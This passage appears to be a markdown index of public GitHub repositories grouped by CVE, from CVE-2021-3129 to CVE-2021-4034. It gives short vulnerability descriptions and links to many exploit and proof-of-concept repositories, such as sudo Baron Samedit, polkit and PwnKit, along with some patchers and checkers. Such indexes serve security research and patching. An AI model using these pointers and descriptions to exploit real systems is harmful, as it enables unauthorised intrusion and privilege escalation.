- [cuongtop4598/CVE-2021-3129-Script](https://github.com/cuongtop4598/CVE-2021-3129-Script)
- [joshuavanderpoll/CVE-2021-3129](https://github.com/joshuavanderpoll/CVE-2021-3129)
- [shadowabi/Laravel-CVE-2021-3129](https://github.com/shadowabi/Laravel-CVE-2021-3129)
- [JacobEbben/CVE-2021-3129](https://github.com/JacobEbben/CVE-2021-3129)
- [hupe1980/CVE-2021-3129](https://github.com/hupe1980/CVE-2021-3129)
- [0nion1/CVE-2021-3129](https://github.com/0nion1/CVE-2021-3129)
- [MadExploits/Laravel-debug-Checker](https://github.com/MadExploits/Laravel-debug-Checker)
- [ajisai-babu/CVE-2021-3129-exp](https://github.com/ajisai-babu/CVE-2021-3129-exp)
- [keyuan15/CVE-2021-3129](https://github.com/keyuan15/CVE-2021-3129)
- [qaisarafridi/cve-2021-3129](https://github.com/qaisarafridi/cve-2021-3129)
- [Zoo1sondv/CVE-2021-3129](https://github.com/Zoo1sondv/CVE-2021-3129)
- [miko550/CVE-2021-3129](https://github.com/miko550/CVE-2021-3129)
- [wmasday/CVE-2021-3129](https://github.com/wmasday/CVE-2021-3129)
- [banyaksepuh/Mass-CVE-2021-3129-Scanner](https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner)
- [Axianke/CVE-2021-3129](https://github.com/Axianke/CVE-2021-3129)
- [cc3305/CVE-2021-3129](https://github.com/cc3305/CVE-2021-3129)
- [piperpwn/CVE-2021-3129-](https://github.com/piperpwn/CVE-2021-3129-)
- [0x0d3ad/CVE-2021-3129](https://github.com/0x0d3ad/CVE-2021-3129)
- [GodOfServer/CVE-2021-3129](https://github.com/GodOfServer/CVE-2021-3129)
### CVE-2021-3130 (2021-01-20)
Within the Open-AudIT up to version 3.5.3 application, the web interface hides SSH secrets, Windows passwords, and SNMP strings from users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible.
- [jet-pentest/CVE-2021-3130](https://github.com/jet-pentest/CVE-2021-3130)
### CVE-2021-3131 (2021-01-13)
The Web server in 1C:Enterprise 8 before 8.3.17.1851 sends base64 encoded credentials in the creds URL parameter.
- [jet-pentest/CVE-2021-3131](https://github.com/jet-pentest/CVE-2021-3131)
### CVE-2021-3138 (2021-01-14)
In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms.
- [Mesh3l911/CVE-2021-3138](https://github.com/Mesh3l911/CVE-2021-3138)
### CVE-2021-3156 (2021-01-26)
Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.
- [mr-r3b00t/CVE-2021-3156](https://github.com/mr-r3b00t/CVE-2021-3156)
- [nexcess/sudo_cve-2021-3156](https://github.com/nexcess/sudo_cve-2021-3156)
- [reverse-ex/CVE-2021-3156](https://github.com/reverse-ex/CVE-2021-3156)
- [unauth401/CVE-2021-3156](https://github.com/unauth401/CVE-2021-3156)
- [ymrsmns/CVE-2021-3156](https://github.com/ymrsmns/CVE-2021-3156)
- [elbee-cyber/CVE-2021-3156-PATCHER](https://github.com/elbee-cyber/CVE-2021-3156-PATCHER)
- [kernelzeroday/CVE-2021-3156-Baron-Samedit](https://github.com/kernelzeroday/CVE-2021-3156-Baron-Samedit)
- [yaunsky/cve-2021-3156](https://github.com/yaunsky/cve-2021-3156)
- [baka9moe/CVE-2021-3156-Exp](https://github.com/baka9moe/CVE-2021-3156-Exp)
- [ph4ntonn/CVE-2021-3156](https://github.com/ph4ntonn/CVE-2021-3156)
- [binw2018/CVE-2021-3156-SCRIPT](https://github.com/binw2018/CVE-2021-3156-SCRIPT)
- [freeFV/CVE-2021-3156](https://github.com/freeFV/CVE-2021-3156)
- [mbcrump/CVE-2021-3156](https://github.com/mbcrump/CVE-2021-3156)
- [stong/CVE-2021-3156](https://github.com/stong/CVE-2021-3156)
- [nobodyatall648/CVE-2021-3156](https://github.com/nobodyatall648/CVE-2021-3156)
- [blasty/CVE-2021-3156](https://github.com/blasty/CVE-2021-3156)
- [teamtopkarl/CVE-2021-3156](https://github.com/teamtopkarl/CVE-2021-3156)
- [Q4n/CVE-2021-3156](https://github.com/Q4n/CVE-2021-3156)
- [kal1gh0st/CVE-2021-3156](https://github.com/kal1gh0st/CVE-2021-3156)
- [apogiatzis/docker-CVE-2021-3156](https://github.com/apogiatzis/docker-CVE-2021-3156)
- [voidlsd/CVE-2021-3156](https://github.com/voidlsd/CVE-2021-3156)
- [Ashish-dawani/CVE-2021-3156-Patch](https://github.com/Ashish-dawani/CVE-2021-3156-Patch)
- [SantiagoSerrao/ScannerCVE-2021-3156](https://github.com/SantiagoSerrao/ScannerCVE-2021-3156)
- [DanielAzulayy/CTF-2021](https://github.com/DanielAzulayy/CTF-2021)
- [cdeletre/Serpentiel-CVE-2021-3156](https://github.com/cdeletre/Serpentiel-CVE-2021-3156)
- [dinhbaouit/CVE-2021-3156](https://github.com/dinhbaouit/CVE-2021-3156)
- [CptGibbon/CVE-2021-3156](https://github.com/CptGibbon/CVE-2021-3156)
- [perlun/sudo-1.8.3p1-patched](https://github.com/perlun/sudo-1.8.3p1-patched)
- [1N53C/CVE-2021-3156-PoC](https://github.com/1N53C/CVE-2021-3156-PoC)
- [0xdevil/CVE-2021-3156](https://github.com/0xdevil/CVE-2021-3156)
- [gmldbd94/cve-2021-3156](https://github.com/gmldbd94/cve-2021-3156)
- [jm33-m0/CVE-2021-3156](https://github.com/jm33-m0/CVE-2021-3156)
- [Rvn0xsy/CVE-2021-3156-plus](https://github.com/Rvn0xsy/CVE-2021-3156-plus)
- [r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability](https://github.com/r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability)
- [oneoy/CVE-2021-3156](https://github.com/oneoy/CVE-2021-3156)
- [worawit/CVE-2021-3156](https://github.com/worawit/CVE-2021-3156)
- [lmol/CVE-2021-3156](https://github.com/lmol/CVE-2021-3156)
- [BearCat4/CVE-2021-3156](https://github.com/BearCat4/CVE-2021-3156)
- [ZTK-009/CVE-2021-3156](https://github.com/ZTK-009/CVE-2021-3156)
- [capturingcats/CVE-2021-3156](https://github.com/capturingcats/CVE-2021-3156)
- [LiveOverflow/pwnedit](https://github.com/LiveOverflow/pwnedit)
- [ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build](https://github.com/ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build)
- [donghyunlee00/CVE-2021-3156](https://github.com/donghyunlee00/CVE-2021-3156)
- [TheFlash2k/CVE-2021-3156](https://github.com/TheFlash2k/CVE-2021-3156)
- [Exodusro/CVE-2021-3156](https://github.com/Exodusro/CVE-2021-3156)
- [CyberCommands/CVE-2021-3156](https://github.com/CyberCommands/CVE-2021-3156)
- [0x7183/CVE-2021-3156](https://github.com/0x7183/CVE-2021-3156)
- [redhawkeye/sudo-exploit](https://github.com/redhawkeye/sudo-exploit)
- [d3c3ptic0n/CVE-2021-3156](https://github.com/d3c3ptic0n/CVE-2021-3156)
- [musergi/CVE-2021-3156](https://github.com/musergi/CVE-2021-3156)
- [halissha/CVE-2021-3156](https://github.com/halissha/CVE-2021-3156)
- [sharkmoos/Baron-Samedit](https://github.com/sharkmoos/Baron-Samedit)
- [chenaotian/CVE-2021-3156](https://github.com/chenaotian/CVE-2021-3156)
- [ret2basic/SudoScience](https://github.com/ret2basic/SudoScience)
- [puckiestyle/CVE-2021-3156](https://github.com/puckiestyle/CVE-2021-3156)
- [barebackbandit/CVE-2021-3156](https://github.com/barebackbandit/CVE-2021-3156)
- [RodricBr/CVE-2021-3156](https://github.com/RodricBr/CVE-2021-3156)
- [ypl6/heaplens](https://github.com/ypl6/heaplens)
- [q77190858/CVE-2021-3156](https://github.com/q77190858/CVE-2021-3156)
- [arvindshima/CVE-2021-3156](https://github.com/arvindshima/CVE-2021-3156)
- [Mhackiori/CVE-2021-3156](https://github.com/Mhackiori/CVE-2021-3156)
- [PhuketIsland/CVE-2021-3156-centos7](https://github.com/PhuketIsland/CVE-2021-3156-centos7)
- [0x4ndy/clif](https://github.com/0x4ndy/clif)
- [hycheng15/CVE-2021-3156](https://github.com/hycheng15/CVE-2021-3156)
- [mutur4/CVE-2021-3156](https://github.com/mutur4/CVE-2021-3156)
- [PurpleOzone/PE_CVE-CVE-2021-3156](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156)
- [asepsaepdin/CVE-2021-3156](https://github.com/asepsaepdin/CVE-2021-3156)
- [DDayLuong/CVE-2021-3156](https://github.com/DDayLuong/CVE-2021-3156)
- [DASICS-ICT/DASICS-CVE-2021-3156](https://github.com/DASICS-ICT/DASICS-CVE-2021-3156)
- [wurwur/CVE-2021-3156](https://github.com/wurwur/CVE-2021-3156)
- [SamTruss/LMU-CVE-2021-3156](https://github.com/SamTruss/LMU-CVE-2021-3156)
- [lypd0/CVE-2021-3156-checker](https://github.com/lypd0/CVE-2021-3156-checker)
- [Typical0day/CVE-2021-3156](https://github.com/Typical0day/CVE-2021-3156)
- [acidburn2049/CVE-2021-3156](https://github.com/acidburn2049/CVE-2021-3156)
### CVE-2021-3157
- [CrackerCat/cve-2021-3157](https://github.com/CrackerCat/cve-2021-3157)
### CVE-2021-3164 (2021-01-21)
ChurchRota 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file via a POST request to resources.php.
- [rmccarth/cve-2021-3164](https://github.com/rmccarth/cve-2021-3164)
### CVE-2021-3166 (2021-01-18)
An issue was discovered on ASUS DSL-N14U-B1 1.1.2.3_805 devices. An attacker can upload arbitrary file content as a firmware update when the filename Settings_DSL-N14U-B1.trx is used. Once this file is loaded, shutdown measures on a wide range of services are triggered as if it were a real update, resulting in a persistent outage of those services.
- [kaisersource/CVE-2021-3166](https://github.com/kaisersource/CVE-2021-3166)
### CVE-2021-3229 (2021-02-05)
Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error.
- [fullbbadda1208/CVE-2021-3229](https://github.com/fullbbadda1208/CVE-2021-3229)
### CVE-2021-3279 (2021-07-19)
sz.chat version 4 allows injection of web scripts and HTML in the message box.
- [rafaelchriss/CVE-2021-3279](https://github.com/rafaelchriss/CVE-2021-3279)
### CVE-2021-3281 (2021-02-02)
In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments.
- [lwzSoviet/CVE-2021-3281](https://github.com/lwzSoviet/CVE-2021-3281)
### CVE-2021-3291 (2021-01-26)
Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
- [ImHades101/CVE-2021-3291](https://github.com/ImHades101/CVE-2021-3291)
### CVE-2021-3310 (2021-03-10)
Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files).
- [piffd0s/CVE-2021-3310](https://github.com/piffd0s/CVE-2021-3310)
### CVE-2021-3317 (2021-01-26)
KLog Server through 2.4.1 allows authenticated command injection. async.php calls shell_exec() on the original value of the source parameter.
- [Al1ex/CVE-2021-3317](https://github.com/Al1ex/CVE-2021-3317)
### CVE-2021-3345 (2021-01-29)
_gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count value. It is recommended to upgrade to 1.9.1 or later.
- [MLGRadish/CVE-2021-3345](https://github.com/MLGRadish/CVE-2021-3345)
- [SpiralBL0CK/CVE-2021-3345](https://github.com/SpiralBL0CK/CVE-2021-3345)
### CVE-2021-3347 (2021-01-29)
An issue was discovered in the Linux kernel through 5.10.11. PI futexes have a kernel stack use-after-free during fault handling, allowing local users to execute code in the kernel, aka CID-34b1a1ce1458.
- [nanopathi/linux-4.19.72_CVE-2021-3347](https://github.com/nanopathi/linux-4.19.72_CVE-2021-3347)
### CVE-2021-3360
- [tcbutler320/CVE-2021-3360](https://github.com/tcbutler320/CVE-2021-3360)
### CVE-2021-3378 (2021-02-01)
FortiLogger 4.4.2.2 is affected by Arbitrary File Upload by sending a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then visiting Assets/temp/hotspot/img/logohotspot.asp.
- [erberkan/fortilogger_arbitrary_fileupload](https://github.com/erberkan/fortilogger_arbitrary_fileupload)
### CVE-2021-3395 (2021-02-02)
A cross-site scripting (XSS) vulnerability in Pryaniki 6.44.3 allows remote authenticated users to upload an arbitrary file. The JavaScript code will execute when someone visits the attachment.
- [jet-pentest/CVE-2021-3395](https://github.com/jet-pentest/CVE-2021-3395)
### CVE-2021-3438 (2021-05-20)
A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.
- [TobiasS1402/CVE-2021-3438](https://github.com/TobiasS1402/CVE-2021-3438)
- [CrackerCat/CVE-2021-3438](https://github.com/CrackerCat/CVE-2021-3438)
### CVE-2021-3441 (2021-10-29)
A potential security vulnerability has been identified for the HP OfficeJet 7110 Wide Format ePrinter that enables Cross-Site Scripting (XSS).
- [tcbutler320/CVE-2021-3441-check](https://github.com/tcbutler320/CVE-2021-3441-check)
### CVE-2021-3449 (2021-03-25)
An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).
- [riptl/cve-2021-3449](https://github.com/riptl/cve-2021-3449)
### CVE-2021-3490 (2021-06-04)
The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") ( 5.10-rc1).
- [chompie1337/Linux_LPE_eBPF_CVE-2021-3490](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)
- [pivik271/CVE-2021-3490](https://github.com/pivik271/CVE-2021-3490)
### CVE-2021-3492 (2021-04-17)
Shiftfs, an out-of-tree stacking file system included in Ubuntu Linux kernels, did not properly handle faults occurring during copy_from_user() correctly. These could lead to either a double-free situation or memory not being freed at all. An attacker could use this to cause a denial of service (kernel memory exhaustion) or gain privileges via executing arbitrary code. AKA ZDI-CAN-13562.
- [synacktiv/CVE-2021-3492](https://github.com/synacktiv/CVE-2021-3492)
### CVE-2021-3493 (2021-04-17)
The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.
- [briskets/CVE-2021-3493](https://github.com/briskets/CVE-2021-3493)
- [oneoy/CVE-2021-3493](https://github.com/oneoy/CVE-2021-3493)
- [Abdennour-py/CVE-2021-3493](https://github.com/Abdennour-py/CVE-2021-3493)
- [inspiringz/CVE-2021-3493](https://github.com/inspiringz/CVE-2021-3493)
- [derek-turing/CVE-2021-3493](https://github.com/derek-turing/CVE-2021-3493)
- [cerodah/overlayFS-CVE-2021-3493](https://github.com/cerodah/overlayFS-CVE-2021-3493)
- [puckiestyle/CVE-2021-3493](https://github.com/puckiestyle/CVE-2021-3493)
- [fei9747/CVE-2021-3493](https://github.com/fei9747/CVE-2021-3493)
- [pmihsan/OverlayFS-CVE-2021-3493](https://github.com/pmihsan/OverlayFS-CVE-2021-3493)
- [smallkill/CVE-2021-3493](https://github.com/smallkill/CVE-2021-3493)
- [ptkhai15/OverlayFS---CVE-2021-3493](https://github.com/ptkhai15/OverlayFS---CVE-2021-3493)
- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357)
- [fathallah17/OverlayFS-CVE-2021-3493](https://github.com/fathallah17/OverlayFS-CVE-2021-3493)
### CVE-2021-3516 (2021-06-01)
There's a flaw in libxml2's xmllint in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.
- [dja2TaqkGEEfA45/CVE-2021-3516](https://github.com/dja2TaqkGEEfA45/CVE-2021-3516)
### CVE-2021-3560 (2022-02-16)
It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
- [aancw/polkit-auto-exploit](https://github.com/aancw/polkit-auto-exploit)
- [swapravo/polkadots](https://github.com/swapravo/polkadots)
- [hakivvi/CVE-2021-3560](https://github.com/hakivvi/CVE-2021-3560)
- [iSTAR-Lab/CVE-2021-3560_PoC](https://github.com/iSTAR-Lab/CVE-2021-3560_PoC)
- [secnigma/CVE-2021-3560-Polkit-Privilege-Esclation](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation)
- [curtishoughton/CVE-2021-3560](https://github.com/curtishoughton/CVE-2021-3560)
- [Almorabea/Polkit-exploit](https://github.com/Almorabea/Polkit-exploit)
- [AssassinUKG/Polkit-CVE-2021-3560](https://github.com/AssassinUKG/Polkit-CVE-2021-3560)
- [cpu0x00/CVE-2021-3560](https://github.com/cpu0x00/CVE-2021-3560)
- [BizarreLove/CVE-2021-3560](https://github.com/BizarreLove/CVE-2021-3560)
- [0dayNinja/CVE-2021-3560](https://github.com/0dayNinja/CVE-2021-3560)
- [admin-079/CVE-2021-3560](https://github.com/admin-079/CVE-2021-3560)
- [chenaotian/CVE-2021-3560](https://github.com/chenaotian/CVE-2021-3560)
- [NeonWhiteRabbit/CVE-2021-3560](https://github.com/NeonWhiteRabbit/CVE-2021-3560)
- [f4T1H21/CVE-2021-3560-Polkit-DBus](https://github.com/f4T1H21/CVE-2021-3560-Polkit-DBus)
- [innxrmxst/CVE-2021-3560](https://github.com/innxrmxst/CVE-2021-3560)
- [RicterZ/CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent)
- [WinMin/CVE-2021-3560](https://github.com/WinMin/CVE-2021-3560)
- [UNICORDev/exploit-CVE-2021-3560](https://github.com/UNICORDev/exploit-CVE-2021-3560)
- [asepsaepdin/CVE-2021-3560](https://github.com/asepsaepdin/CVE-2021-3560)
- [pashayogi/ROOT-CVE-2021-3560](https://github.com/pashayogi/ROOT-CVE-2021-3560)
- [TieuLong21Prosper/CVE-2021-3560](https://github.com/TieuLong21Prosper/CVE-2021-3560)
- [LucasPDiniz/CVE-2021-3560](https://github.com/LucasPDiniz/CVE-2021-3560)
- [markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation](https://github.com/markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation)
- [Kyyomaa/CVE-2021-3560-EXPLOIT](https://github.com/Kyyomaa/CVE-2021-3560-EXPLOIT)
### CVE-2021-3572 (2021-11-10)
A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.
- [frenzymadness/CVE-2021-3572](https://github.com/frenzymadness/CVE-2021-3572)
### CVE-2021-3625 (2021-10-05)
Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions >= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f363
- [szymonh/zephyr_cve-2021-3625](https://github.com/szymonh/zephyr_cve-2021-3625)
### CVE-2021-3656 (2022-03-04)
A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.
- [rami08448/CVE-2021-3656-Demo](https://github.com/rami08448/CVE-2021-3656-Demo)
### CVE-2021-3679 (2021-08-05)
A lack of CPU resource in the Linux kernel tracing module functionality in versions prior to 5.14-rc3 was found in the way user uses trace ring buffer in a specific way. Only privileged local users (with CAP_SYS_ADMIN capability) could use this flaw to starve the resources causing denial of service.
- [aegistudio/RingBufferDetonator](https://github.com/aegistudio/RingBufferDetonator)
### CVE-2021-3707 (2021-08-16)
D-Link router DSL-2750U with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. An unauthenticated attacker on the local network may exploit this, with CVE-2021-3708, to execute any OS commands on the vulnerable device.
- [HadiMed/DSL-2750U-Full-chain](https://github.com/HadiMed/DSL-2750U-Full-chain)
### CVE-2021-3749 (2021-08-31)
axios is vulnerable to Inefficient Regular Expression Complexity
- [T-Guerrero/axios-redos](https://github.com/T-Guerrero/axios-redos)
### CVE-2021-3754 (2022-08-26)
A flaw was found in keycloak where an attacker is able to register himself with the username same as the email ID of any existing user. This may cause trouble in getting password recovery email in case the user forgets the password.
- [7Ragnarok7/CVE-2021-3754](https://github.com/7Ragnarok7/CVE-2021-3754)
### CVE-2021-3773 (2022-02-16)
A flaw in netfilter could allow a network-connected attacker to infer openvpn connection endpoint information for further use in traditional network attacks.
- [d0rb/CVE-2021-3773](https://github.com/d0rb/CVE-2021-3773)
### CVE-2021-3864 (2022-08-26)
A flaw was found in the way the dumpable flag setting was handled when certain SUID binaries executed its descendants. The prerequisite is a SUID binary that sets real UID equal to effective UID, and real GID equal to effective GID. The descendant will then have a dumpable value set to 1. As a result, if the descendant process crashes and core_pattern is set to a relative value, its core dump is stored in the current directory with uid:gid permissions. An unprivileged local user with eligible root SUID binary could use this flaw to place core dumps into root-owned directories, potentially resulting in escalation of privileges.
- [walac/cve-2021-3864](https://github.com/walac/cve-2021-3864)
### CVE-2021-3899 (2024-06-03)
There is a race condition in the 'replaced executable' detection that, with the correct local configuration, allow an attacker to execute arbitrary code as root.
- [liumuqing/CVE-2021-3899_PoC](https://github.com/liumuqing/CVE-2021-3899_PoC)
### CVE-2021-3929 (2022-08-25)
A DMA reentrancy issue was found in the NVM Express Controller (NVME) emulation in QEMU. This CVE is similar to CVE-2021-3750 and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition or, potentially, executing arbitrary code within the context of the QEMU process on the host.
- [QiuhaoLi/CVE-2021-3929-3947](https://github.com/QiuhaoLi/CVE-2021-3929-3947)
### CVE-2021-3972 (2022-04-22)
A potential vulnerability by a driver used during manufacturing process on some consumer Lenovo Notebook devices' BIOS that was mistakenly not deactivated may allow an attacker with elevated privileges to modify secure boot setting by modifying an NVRAM variable.
- [killvxk/CVE-2021-3972](https://github.com/killvxk/CVE-2021-3972)
### CVE-2021-4034 (2022-01-28)
A local privilege escalation vulnerability was found on polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it'll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
- [ryaagard/CVE-2021-4034](https://github.com/ryaagard/CVE-2021-4034)
- [berdav/CVE-2021-4034](https://github.com/berdav/CVE-2021-4034)
- [clubby789/CVE-2021-4034](https://github.com/clubby789/CVE-2021-4034)
- [gbrsh/CVE-2021-4034](https://github.com/gbrsh/CVE-2021-4034)
- [arthepsy/CVE-2021-4034](https://github.com/arthepsy/CVE-2021-4034)
- [JohnHammond/CVE-2021-4034](https://github.com/JohnHammond/CVE-2021-4034)
- [Audiobahn/CVE-2021-4034](https://github.com/Audiobahn/CVE-2021-4034)
- [dzonerzy/poc-cve-2021-4034](https://github.com/dzonerzy/poc-cve-2021-4034)
- [nikaiw/CVE-2021-4034](https://github.com/nikaiw/CVE-2021-4034)
- [mebeim/CVE-2021-4034](https://github.com/mebeim/CVE-2021-4034)
- [Ayrx/CVE-2021-4034](https://github.com/Ayrx/CVE-2021-4034)
- [Y3A/CVE-2021-4034](https://github.com/Y3A/CVE-2021-4034)
- [An00bRektn/CVE-2021-4034](https://github.com/An00bRektn/CVE-2021-4034)
- [ayypril/CVE-2021-4034](https://github.com/ayypril/CVE-2021-4034)
- [wongwaituck/CVE-2021-4034](https://github.com/wongwaituck/CVE-2021-4034)
- [0x05a/my-cve-2021-4034-poc](https://github.com/0x05a/my-cve-2021-4034-poc)
- [silocityit/cve-2021-4034-playground](https://github.com/silocityit/cve-2021-4034-playground)
- [zhzyker/CVE-2021-4034](https://github.com/zhzyker/CVE-2021-4034)
- [J0hnbX/CVE-2021-4034-new](https://github.com/J0hnbX/CVE-2021-4034-new)
- [Immersive-Labs-Sec/CVE-2021-4034](https://github.com/Immersive-Labs-Sec/CVE-2021-4034)
- [kimusan/pkwner](https://github.com/kimusan/pkwner)
- [N1et/CVE-2021-4034](https://github.com/N1et/CVE-2021-4034)
- [Nero22k/CVE-2021-4034](https://github.com/Nero22k/CVE-2021-4034)
- [LukeGix/CVE-2021-4034](https://github.com/LukeGix/CVE-2021-4034)
- [aus-mate/CVE-2021-4034-POC](https://github.com/aus-mate/CVE-2021-4034-POC)
- [chenaotian/CVE-2021-4034](https://github.com/chenaotian/CVE-2021-4034)
- [moldabekov/CVE-2021-4034](https://github.com/moldabekov/CVE-2021-4034)
- [jostmart/-CVE-2021-4034](https://github.com/jostmart/-CVE-2021-4034)
- [c3l3si4n/pwnkit](https://github.com/c3l3si4n/pwnkit)
- [h3xcr4ck3r/CVE-2021-4034](https://github.com/h3xcr4ck3r/CVE-2021-4034)
- [ly4k/PwnKit](https://github.com/ly4k/PwnKit)
- [san3ncrypt3d/CVE-2021-4034-POC](https://github.com/san3ncrypt3d/CVE-2021-4034-POC)
- [fdellwing/CVE-2021-4034](https://github.com/fdellwing/CVE-2021-4034)
- [xcanwin/CVE-2021-4034-UniontechOS](https://github.com/xcanwin/CVE-2021-4034-UniontechOS)
- [azminawwar/CVE-2021-4034](https://github.com/azminawwar/CVE-2021-4034)
- [PeterGottesman/pwnkit-exploit](https://github.com/PeterGottesman/pwnkit-exploit)
- [sunny0day/CVE-2021-4034](https://github.com/sunny0day/CVE-2021-4034)
- [artemis-mike/cve-2021-4034](https://github.com/artemis-mike/cve-2021-4034)
- [whokilleddb/CVE-2021-4034](https://github.com/whokilleddb/CVE-2021-4034)
- [dadvlingd/CVE-2021-4034](https://github.com/dadvlingd/CVE-2021-4034)
- [zcrosman/cve-2021-4034](https://github.com/zcrosman/cve-2021-4034)
- [robemmerson/CVE-2021-4034](https://github.com/robemmerson/CVE-2021-4034)
- [joeammond/CVE-2021-4034](https://github.com/joeammond/CVE-2021-4034)
- [luijait/PwnKit-Exploit](https://github.com/luijait/PwnKit-Exploit)
- [Anonymous-Family/CVE-2021-4034](https://github.com/Anonymous-Family/CVE-2021-4034)
- [phvilasboas/CVE-2021-4034](https://github.com/phvilasboas/CVE-2021-4034)
- [hackingyseguridad/CVE-2021-4034](https://github.com/hackingyseguridad/CVE-2021-4034)
- [vilasboasph/CVE-2021-4034](https://github.com/vilasboasph/CVE-2021-4034)
- [nobelh/CVE-2021-4034](https://github.com/nobelh/CVE-2021-4034)
- [callrbx/pkexec-lpe-poc](https://github.com/callrbx/pkexec-lpe-poc)
- [ch4rum/CVE-2021-4034](https://github.com/ch4rum/CVE-2021-4034)
- [cd80-ctf/CVE-2021-4034](https://github.com/cd80-ctf/CVE-2021-4034)
- [Al1ex/CVE-2021-4034](https://github.com/Al1ex/CVE-2021-4034)
- [ashutoshrohilla/CVE-2021-4034](https://github.com/ashutoshrohilla/CVE-2021-4034)
- [nikip72/CVE-2021-4034](https://github.com/nikip72/CVE-2021-4034)
- [NiS3x/CVE-2021-4034](https://github.com/NiS3x/CVE-2021-4034)
- [thatstraw/CVE-2021-4034](https://github.com/thatstraw/CVE-2021-4034)
- [luckythandel/CVE-2021-4034](https://github.com/luckythandel/CVE-2021-4034)
- [Plethore/CVE-2021-4034](https://github.com/Plethore/CVE-2021-4034)
- [evdenis/lsm_bpf_check_argc0](https://github.com/evdenis/lsm_bpf_check_argc0)
- [tahaafarooq/poppy](https://github.com/tahaafarooq/poppy)
- [DosAmp/pkwned](https://github.com/DosAmp/pkwned)
- [PwnFunction/CVE-2021-4034](https://github.com/PwnFunction/CVE-2021-4034)
- [locksec/CVE-2021-4034](https://github.com/locksec/CVE-2021-4034)
- [deoxykev/CVE-2021-4034-Rust](https://github.com/deoxykev/CVE-2021-4034-Rust)
- [c3c/CVE-2021-4034](https://github.com/c3c/CVE-2021-4034)
